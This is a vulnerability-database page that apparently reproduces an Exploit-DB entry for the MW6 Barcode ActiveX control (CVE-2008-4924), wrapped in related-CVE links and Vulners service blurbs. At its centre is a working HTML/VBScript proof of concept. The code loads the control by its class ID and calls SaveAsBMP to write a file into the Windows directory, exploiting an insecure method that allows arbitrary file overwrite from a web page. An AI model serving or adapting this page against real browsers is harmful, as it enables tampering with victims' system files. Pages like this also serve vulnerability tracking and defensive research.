Lucene search
+L

MW6 Barcode - ActiveX 'Barcode.dll' Insecure Method

🗓️ 29 Oct 2008 00:00:00Reported by DeltahackingTEAMType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

MW6 Barcode ActiveX 'Barcode.dll' Insecure Method ver 3.0.0.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-4924
29 Oct 200800:00
circl
CVE
CVE-2008-4924
4 Nov 200820:00
cve
Cvelist
CVE-2008-4924
4 Nov 200820:00
cvelist
EUVD
EUVD-2008-4903
7 Oct 202500:30
euvd
NVD
CVE-2008-4924
4 Nov 200821:00
nvd
Prion
Design/Logic Flaw
4 Nov 200821:00
prion
<!--
By Dr.Pantagon
DeltaSecurityCenter
www.DeltaSecurity.ir
Description : 1D Barcode ActiveX
ver : 3.0.0.1
CopyRight : MW6 Technologies, Inc.
Download Link : http://www.mw6tech.com/barcode/try/MW6Barcode.zip

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6

This control contains two methods SaveAsBMP(); And SaveAsWMF();

Sub SaveAsWMF (
 	ByVal FileName  As String
)

AND

Sub SaveAsWMF (
 	ByVal FileName  As String
)
you can see this problem to all product this company
-->
<html>
<object classid='clsid:14D09688-CFA7-11D5-995A-005004CE563B' id='target' >
	<param name="BackColor" value="16777215">
	<param name="BarHeight" value="1,5">
	<param name="BarColor" value="0">
	<param name="BorderStyle" value="0">
	<param name="CheckDigit" value="0">
	<param name="CheckDigitToText" value="0">
	<param name="CodaBarStartChar" value="65">
	<param name="CodaBarStopChar" value="66">
	<param name="Data" value="1234">
	<param name="NarrowBarWidth" value="0,07">
	<param name="Orientation" value="0">
	<param name="ShowText" value="1">
	<param name="Supplement" value="">
	<param name="SupplementGap" value="0,5">
	<param name="SupplementType" value="0">
	<param name="SymbologyType" value="2">
	<param name="UPCESystem" value="0">
	<param name="Wide2NarrowRatio" value="2">
	<param name="FontName" value="Arial">
	<param name="FontItalic" value="0">
	<param name="FontStrikeOut" value="0">
	<param name="FontUnderline" value="0">
	<param name="FontWeight" value="400">
	<param name="FontHeight" value="24">
</object>
<script language='vbscript'>
targetFile = "C:\WINDOWS\system32\Barcode.dll"
prototype  = "Sub SaveAsBMP ( ByVal FileName As String )"
memberName = "SaveAsBMP"
progid     = "BARCODELib.MW6Barcode"
argCount   = 1
arg1="c:\windows\system_.ini"

target.SaveAsBMP arg1

'target.SaveAsWMF arg1

</script>

# milw0rm.com [2008-10-29]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jan 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29
EPSS0.07149
35